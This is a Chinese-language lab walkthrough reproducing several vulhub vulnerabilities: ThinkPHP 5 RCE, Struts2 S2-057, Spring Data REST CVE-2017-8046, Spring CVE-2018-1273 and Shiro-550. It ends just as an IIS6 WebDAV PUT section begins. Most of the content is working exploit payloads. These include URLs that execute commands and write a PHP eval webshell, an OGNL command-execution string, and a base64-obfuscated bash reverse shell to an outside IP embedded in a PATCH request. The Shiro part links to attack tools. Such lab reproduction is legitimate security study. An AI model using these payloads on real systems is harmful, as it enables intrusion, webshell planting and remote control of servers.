Thinkphp 之 5-rce
靶场 vulhub/thinkphp/5-rce
data:image/s3,"s3://crabby-images/aeb36/aeb3604b41eccb17e2542674b87dd4b1c09ce48c" alt=""
漏洞根本源于 thinkphp/library/think/Request.php 中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现一些问题。
远程命令执行
/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
data:image/s3,"s3://crabby-images/3ead4/3ead4804cb723085b9eedbc0dc2dc6571b253d4e" alt=""
whoami
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
data:image/s3,"s3://crabby-images/f1563/f15633941790187b709ea211b145fa8f96e07f8a" alt=""
将php代码写入文件,并访问
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>
data:image/s3,"s3://crabby-images/a2881/a288163cccf9ad1ce86c25a14456e02b736cb514" alt=""
data:image/s3,"s3://crabby-images/c6c19/c6c1984fbccc11bbc41aa5df1ad380c119fd807a" alt=""
写入一个一句话木马
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell2.php&vars[1][]=<?php eval($_POST[cmd]);?>
shell工具连接
data:image/s3,"s3://crabby-images/85b90/85b903fbc17bb4dfd800d60fde89e53bb72e451f" alt=""
struts2之s2-057
vulhub靶机
访问靶场
ip/struts2-showcase
data:image/s3,"s3://crabby-images/5ff7e/5ff7e8fb369640ea6ebf48113b8d8d3775234b2c" alt=""
输入以下url
http://1.92.134.1:8080/struts2-showcase/${(123+123)}/actionChain1.action
页面回显
http://1.92.134.1:8080/struts2-showcase/246/register2.action
把上面验证payload的值修改为我们的利用exp
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#ct=#request['struts.valueStack'].context).
(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).
(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).
(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('whoami')).
(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
然后经过url编码放入上方位置中即可看到代码被执行whoami
spring之CVE-2017-8046
靶场 spring/CVE-2017-8046
服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码
打开环境后看到
data:image/s3,"s3://crabby-images/e28e5/e28e5784eb934f0c272c31d9fde57fb36f1f918f" alt=""
访问customers,得到
{
"_embedded" : {
"customers" : [ {
"firstname" : "Dave",
"lastname" : "Matthews",
"gender" : "MALE",
"address" : {
"street" : "4711 Some Place",
"zipCode" : "54321",
"city" : "Charlottesville",
"state" : "VA"
},
"_links" : {
"self" : {
"href" : "http://1.92.134.1:8080/customers/1"
},
"customer" : {
"href" : "http://1.92.134.1:8080/customers/1"
}
}
} ]
},
"_links" : {
"self" : {
"href" : "http://1.92.134.1:8080/customers"
},
"profile" : {
"href" : "http://1.92.134.1:8080/profile/customers"
}
}
}
可以利用代码块生成Ascii的命令
Kotlin
payload = b'touch /tmp/success'
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)
Kotlin
bash -i >& /dev/tcp/192.168.177.142/6666 0>&1
base64
反弹编码
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Ny4xNDIvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}
拼接payload
payload = b'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Ny4xNDIvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}'
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)
98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,51,78,121,52,120,78,68,73,118,78,106,89,50,78,105,65,119,80,105,89,120,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125
访问customers/1 添加content-type 以及最后的payload访问即可
html
PATCH /customers/1 HTTP/1.1
Host: 192.168.177.160:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/json-patch+json
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 461
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,51,78,121,52,120,78,68,73,118,78,106,89,50,78,105,65,119,80,105,89,120,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname", "value": "vulhub" }]
成功获得shell
data:image/s3,"s3://crabby-images/9d74e/9d74ebc6788c693a6b42705e268c588d181da050" alt=""
spring之CVE-2018-1273
安装靶场 访问项目地址/users
data:image/s3,"s3://crabby-images/2f048/2f048bf7bf3ff23dd8964d56a36528c1ab739a05" alt=""
填写信息bp抓包
data:image/s3,"s3://crabby-images/6287a/6287a261b26026a7991e5e0ef273bdae01cab1bc" alt=""
写入poc
html
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=
data:image/s3,"s3://crabby-images/7a7c9/7a7c98db46702b11a4fca1c44b06a032bd0aaaab" alt=""
终端查看信息
html
docker exec -it 08d7538b367f /bin/bash
data:image/s3,"s3://crabby-images/33122/3312236cd42aceb1dffc9e42a6676733f2cf229d" alt=""
反弹shell改日再弹。
Shiro之rememberMe反序列化漏洞(Shiro-550)
vulhub靶场 /shiro/CVE-2016-4437
data:image/s3,"s3://crabby-images/d99df/d99df4cd59f13e6e5d53930612e2bff7ca2141bd" alt=""
使⽤BurpSuite进⾏抓包,在请求包中的cookie字段中添加rememberMe=123;,看响应包 header中是否返回 rememberMe=deleteMe值,若有,则证明该系统使⽤了Shiro框架:
data:image/s3,"s3://crabby-images/27b4b/27b4b77fc30a3ee5b18068db41a19abf95379f8a" alt=""
使用工具进行攻击,手工,别搞笑了
https://github.com/j1anFen/shiro_attack
data:image/s3,"s3://crabby-images/f5955/f5955873963eaa956c53a011887299ab6dbc6b04" alt=""
https://github.com/feihong-cs/ShiroExploit-Deprecated反弹shell工具
中间件系列
iis6.x篇
PUT漏洞复现
准备复现winser2003 开启webdav
data:image/s3,"s3://crabby-images/b26ee/b26ee9662704072e0e87ec56f201539d72e3d756" alt=""
开启写入
data:image/s3,"s3://crabby-images/87210/872107a036c53d5101edbb83a5e92da24fc1e443" alt=""
抓包查看支持协议,提交options
data:image/s3,"s3://crabby-images/6f207/6f207c84dab7a865944b18a4d368260caa6de313" alt=""